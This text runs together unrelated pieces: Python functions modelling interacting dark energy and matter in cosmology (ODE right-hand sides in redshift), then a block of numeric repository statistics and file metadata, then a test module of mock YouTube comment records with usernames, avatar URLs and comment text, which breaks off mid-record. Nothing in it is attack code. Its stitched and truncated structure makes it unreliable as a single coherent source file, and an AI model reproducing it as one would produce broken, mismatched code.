    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def gammaxxz(v, t, gamma, H0):
    """ODE right-hand side with a gamma**z interaction term, d/dz form.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('gammaxxz')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Matter <-> dark-energy exchange rate, scaled as gamma**z.
    irate = (gamma**z)*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def rdecay_m(v, t, gamma, H0):
    """ODE right-hand side: decay rate proportional to the matter fraction.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('rdecay_m')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Rate of ombar change with redshift, driven by (1 - matter fraction).
    irate = gamma*(1-ombar_m/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def rdecay_de(v, t, gamma, H0):
    """ODE right-hand side: decay rate proportional to the dark-energy fraction.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('rdecay_de')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Rate of ombar change with redshift, driven by (1 - dark-energy fraction).
    irate = gamma*(1-ombar_de/(ombar_de+ombar_m)) /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def rdecay_mxde(v, t, gamma, H0):
    """ODE right-hand side: decay rate proportional to ombar_m * ombar_de.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('rdecay_mxde')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Rate of ombar change with redshift: product of both densities.
    irate = gamma*ombar_de*ombar_m /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def rdecay(v, t, gamma, H0):
    """ODE right-hand side: decay rate proportional to ombar_de.

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('rdecay')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Rate of ombar change with redshift, proportional to the DE density.
    irate = gamma*ombar_de /(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - irate    # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, irate, 1, dldz]
def interacting(v, t, gamma, H0):
    """ODE right-hand side with a constant-gamma interaction term, d/dz form.

    UNPHYSICAL FOR |gamma| > 0.1 BEFORE z = 2 (note carried over from the
    original author).

    v     -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t     -- redshift list for the integrator (shadowed by v's own t entry)
    gamma -- interaction strength
    H0    -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        # Diagnostic dump when the densities push H(z) out of the real domain.
        print('interacting')
        print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, gamma, ombar_m, ombar_de))

    # Constant exchange rate: matter loses what dark energy gains.
    rate = gamma/(1+z)/Hz

    dtdz = -1/((1+z) * Hz)             # dt/dz
    dadz = -(1+z)**(-2)                # d(scale factor)/dz
    dmdz = 3*ombar_m /(1+z) - rate     # d(ombar_m)/dz
    dldz = 1/Hz                        # d(luminosity distance)/dz

    return [dtdz, dadz, dmdz, rate, 1, dldz]
def LCDM(v, t, H0):
    """Non-interacting (LCDM-style) ODE right-hand side, d/dz form.

    v  -- state at the current z: (t, a, ombar_m, ombar_de, z, dl)
    t  -- redshift list for the integrator (shadowed by v's own t entry)
    H0 -- Hubble constant at z = 0

    Returns [dt/dz, da/dz, d(ombar_m)/dz, d(ombar_de)/dz, dz/dz, d(dl)/dz].
    """
    t, a, ombar_m, ombar_de, z, dl = v

    # Hubble parameter at this z from the total (dimensionless) density.
    Hz = H0 * (ombar_m + ombar_de)**(1/2)

    if np.isnan(Hz):
        print('LCDM')
        # BUG FIX: the original format string carried five %s placeholders
        # (including gamma, which LCDM does not take) but only four values,
        # so this diagnostic raised TypeError exactly when it was needed.
        print('z = %s, Hz = %s, ombar_m = %s, ombar_de = %s'
              %(z, Hz, ombar_m, ombar_de))

    # First derivatives of the quantities being integrated:
    f = [-1/((1+z) * Hz),      # dt/dz
         -(1+z)**(-2),         # d(scale factor)/dz
         3*ombar_m /(1+z),     # d(ombar_m)/dz — no interaction term
         0,                    # d(ombar_de)/dz — dark energy is constant here
         1,                    # dz/dz
         1/Hz]                 # d(luminosity distance)/dz
    return f
#def LCDM(v, z, H0):
# """
# Takes in:
# v = values at z=0;
# t = list of redshifts to integrate over;
# gamma = interaction term.
#
# Returns a function f = [dt/dz, d(a)/dz,
# d(e'_m)/dz, d(e'_de)/dz,
# d(z)/dz,
# d(dl)/dz]
# """
# (ombar_m, ombar_de, dl) = v #omegam, omegade, z, dl) = v
#
# Hz = H0 * (ombar_m + ombar_de)**(1/2)
#
# import numpy as np
# if np.isnan(Hz):
# print('z = %s, Hz = %s, gamma = %s, ombar_m = %s, ombar_de = %s'
# %(z, Hz, ombar_m, ombar_de))
#
# # fist derivatives of functions I want to find:
# f = [# d(ombar_m)/dz (= f.d wrt z of density_m(t) / crit density(t0))
# 3*ombar_m /(1+z),
#
# # d(ombar_de)/dz (= f.d wrt z of density_de(t) / crit desnity(t0))
# 0,
#
# # d(dl)/dz (= f.d wrt z of luminosty distance)
# 1/Hz] # H + Hdz*(1+z)
#
# return f
| 30.376689
| 76
| 0.421565
| 2,705
| 17,983
| 2.715712
| 0.043623
| 0.071876
| 0.040839
| 0.071467
| 0.94446
| 0.940512
| 0.940512
| 0.940512
| 0.935883
| 0.935883
| 0
| 0.025569
| 0.423678
| 17,983
| 592
| 77
| 30.376689
| 0.68323
| 0.520436
| 0
| 0.778351
| 0
| 0.061856
| 0.097905
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061856
| false
| 0
| 0.005155
| 0
| 0.128866
| 0.123711
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
11cf70b247c22683411349776adc6b297f4b5d0a
| 20,437
|
py
|
Python
|
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
Tests/test_integration/response_data_sort.py
|
duncanbackr/jit_analytics
|
9c81ff294459ccda5f3d3ace40dd5f5b44cfa4d1
|
[
"MIT"
] | null | null | null |
import datetime
mock_badge = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyK4xg31xlsnsA6SWZM_4XFBqKCvSzFp48kyhOaTHs=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15213, 'authorDisplayName': 'kate ramsay', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 53, 29), 'commentID': 25925, 'textDisplay': 'this is one of my favourite songs', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxhGNURpsRc4-wZa3PQwcmWOnq4K7fPTqjx53vb=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15179, 'authorDisplayName': 'Rowdy Mouse', 'commentDatePosted': datetime.datetime(2015, 11, 30, 13, 51), 'commentID': 25869, 'textDisplay': "One time Matt sang happy birthday to my girlfriend Esiri over the internet.\nThanks for that btw Matt. I've never been laid so hard in my life. Although she did yell your name a couple of times, hope you don't mind.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzuzD3xT6MChz0e5AV4Ii3hoc3zSFQT3-vbQ7Fx4g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15185, 'authorDisplayName': 'VeXeBB', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 4, 6), 'commentID': 25879, 'textDisplay': 'I wish you were my vocal coach! Awesome Matt!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! 
Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzreDMwlepx-hd2mU5f4FCqT7Iall-AJoloA-9c=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 4045, 'authorDisplayName': 'P Elnerud', 'commentDatePosted': datetime.datetime(2015, 12, 2, 22, 33, 24), 'commentID': 25839, 'textDisplay': 'Yesss!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxd4wuBKZG4164EE1PQ2XjME6Q5WsuJ_MsfCA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15211, 'authorDisplayName': 'Sporky0', 'commentDatePosted': datetime.datetime(2015, 10, 24, 22, 40, 8), 'commentID': 25920, 'textDisplay': "Love your videos Matt, always have. But it might just be me but the echo/reverb (whatever it was) on the voice was kinda annoying. It overshadowed your vocals and I found it difficult to listen to. \nI'm not trying to shit on you or the video, just sharing my opinion.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! 
Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxLREJhsl7hGohv5C3S-zQWmDVnqFUOGFLTepE43w=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15171, 'authorDisplayName': 'Meaghan Kalinowski', 'commentDatePosted': datetime.datetime(2015, 12, 1, 0, 54, 18), 'commentID': 25847, 'textDisplay': 'labyrinth', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwmB3fa5sJSlOT35rkWCVfZn85qwy_qsrY_u3AJ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15205, 'authorDisplayName': 'Remelox', 'commentDatePosted': datetime.datetime(2015, 10, 28, 21, 44, 58), 'commentID': 25909, 'textDisplay': 'Nice to get this but upset to lose the How Long Can You Dance video.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}]
mock_retain = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwDyt4r0JGdXMdPYnGaXTwnUEkKtB8_Zxjiog=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3896, 'authorDisplayName': 'BatmanShampoo', 'commentDatePosted': datetime.datetime(2015, 11, 30, 16, 16, 33), 'commentID': 25863, 'textDisplay': 'Amazing video as always! Keep up the awesome work bringing laughs and smiles!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzlMgqNHe3yvtxnRoWAmAT0mKTzncTHn9pobA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': None, 'fanID': 15214, 'authorDisplayName': 'QuannanHade', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 21, 9), 'commentID': 25931, 'textDisplay': 'Finally, two of my favourite youtubers combine into one powerful team.\n\nNow, you just need to introduce Chris to The Steinbenders.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! 
Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJx4rJMozMawnopW_TwtW0d9YZ5f-551Xyh0Dw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13065, 'authorDisplayName': 'gml4', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 6, 20), 'commentID': 25926, 'textDisplay': 'Wait a minute... I can only like this once?! This made me super happy to see you working with my favorite youtube trombonist... great collaboration. This one completely justifies my opinion that you are a very talented musician Matt.... thank you for sharing this, and all that you do.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz90VfgUZwHDDtihzUX_yTWMYdSf_dIx3O5Rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 12780, 'authorDisplayName': 'mynameismatt2010', 'commentDatePosted': datetime.datetime(2015, 12, 1, 1, 6, 46), 'commentID': 25846, 'textDisplay': "Awesome as always Matt! I'm wondering if you're planning on continuing to move more towards these more serious covers or if there will be more comedy videos to come? 
Either way your videos are always great!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwgwf9bW8WM46uEg8ECRCuDD18Is4usviCrZCHv3g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3945, 'authorDisplayName': 'Michelle Karbon', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 2, 1), 'commentID': 25859, 'textDisplay': "You're so awesome! I love this and we need another recorder by candlelight soon!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyVben0E203Z_mgaX3OJ1s2QNgp3u5QcG21S_l2Jg=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13453, 'authorDisplayName': 'Brigitta Sz.', 'commentDatePosted': datetime.datetime(2015, 10, 25, 6, 53, 34), 'commentID': 25916, 'textDisplay': 'Még mindig szuper hangod van :) jó lett a klip! BYEEEEEE XD', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxnXmg4gIIRFy0PYKwS-Eb2400IR8Vwaj0Oow=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13747, 'authorDisplayName': 'shikumaru55', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 23, 13), 'commentID': 25930, 'textDisplay': "So you're not dead?", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
mock_balance = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwDyt4r0JGdXMdPYnGaXTwnUEkKtB8_Zxjiog=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3896, 'authorDisplayName': 'BatmanShampoo', 'commentDatePosted': datetime.datetime(2015, 11, 30, 16, 16, 33), 'commentID': 25863, 'textDisplay': 'Amazing video as always! Keep up the awesome work bringing laughs and smiles!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwXeAzbLHuG_I_R8flkD3VGm7OTBYKncPjJ2tv9rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14733, 'authorDisplayName': 'Lukas van der Heul', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 14, 24), 'commentID': 25877, 'textDisplay': 'BOOM! Another cool video of Matt Mulholland has arived in my subscribsion list! Love It!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzreDMwlepx-hd2mU5f4FCqT7Iall-AJoloA-9c=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 4045, 'authorDisplayName': 'P Elnerud', 'commentDatePosted': datetime.datetime(2015, 12, 2, 22, 33, 24), 'commentID': 25839, 'textDisplay': 'Yesss!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzvOmnTsA91zWviyECT-sft2g_WlxThvvLP_m1oNuc=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3974, 'authorDisplayName': 'David Lang', 'commentDatePosted': datetime.datetime(2015, 10, 24, 10, 21, 14), 'commentID': 25933, 'textDisplay': 'Delightful! 
Tasty Bones!', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJymZVZeOBTgKkSaRTWFlQBw6nGuHgWE1HkmekCvww=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 14141, 'authorDisplayName': 'Junkmech', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 27, 40), 'commentID': 25858, 'textDisplay': 'Let the panties hit the floor.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJx4rJMozMawnopW_TwtW0d9YZ5f-551Xyh0Dw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13065, 'authorDisplayName': 'gml4', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 6, 20), 'commentID': 25926, 'textDisplay': 'Wait a minute... I can only like this once?! This made me super happy to see you working with my favorite youtube trombonist... great collaboration. This one completely justifies my opinion that you are a very talented musician Matt.... thank you for sharing this, and all that you do.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz90VfgUZwHDDtihzUX_yTWMYdSf_dIx3O5Rw=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 12780, 'authorDisplayName': 'mynameismatt2010', 'commentDatePosted': datetime.datetime(2015, 12, 1, 1, 6, 46), 'commentID': 25846, 'textDisplay': "Awesome as always Matt! I'm wondering if you're planning on continuing to move more towards these more serious covers or if there will be more comedy videos to come? 
Either way your videos are always great!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwgwf9bW8WM46uEg8ECRCuDD18Is4usviCrZCHv3g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 3945, 'authorDisplayName': 'Michelle Karbon', 'commentDatePosted': datetime.datetime(2015, 11, 30, 19, 2, 1), 'commentID': 25859, 'textDisplay': "You're so awesome! I love this and we need another recorder by candlelight soon!", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyVben0E203Z_mgaX3OJ1s2QNgp3u5QcG21S_l2Jg=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13453, 'authorDisplayName': 'Brigitta Sz.', 'commentDatePosted': datetime.datetime(2015, 10, 25, 6, 53, 34), 'commentID': 25916, 'textDisplay': 'Még mindig szuper hangod van :) jó lett a klip! BYEEEEEE XD', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxnXmg4gIIRFy0PYKwS-Eb2400IR8Vwaj0Oow=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'topFan', 'fanID': 13747, 'authorDisplayName': 'shikumaru55', 'commentDatePosted': datetime.datetime(2015, 10, 24, 11, 23, 13), 'commentID': 25930, 'textDisplay': "So you're not dead?", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
mock_growth = [{'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyK4xg31xlsnsA6SWZM_4XFBqKCvSzFp48kyhOaTHs=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15213, 'authorDisplayName': 'kate ramsay', 'commentDatePosted': datetime.datetime(2015, 10, 24, 17, 53, 29), 'commentID': 25925, 'textDisplay': 'this is one of my favourite songs', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxhGNURpsRc4-wZa3PQwcmWOnq4K7fPTqjx53vb=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15179, 'authorDisplayName': 'Rowdy Mouse', 'commentDatePosted': datetime.datetime(2015, 11, 30, 13, 51), 'commentID': 25869, 'textDisplay': "One time Matt sang happy birthday to my girlfriend Esiri over the internet.\nThanks for that btw Matt. I've never been laid so hard in my life. Although she did yell your name a couple of times, hope you don't mind.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzuzD3xT6MChz0e5AV4Ii3hoc3zSFQT3-vbQ7Fx4g=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15185, 'authorDisplayName': 'VeXeBB', 'commentDatePosted': datetime.datetime(2015, 11, 30, 12, 4, 6), 'commentID': 25879, 'textDisplay': 'I wish you were my vocal coach! Awesome Matt!', 'archive': False, 'up_vote': None, 'down_vote': None, 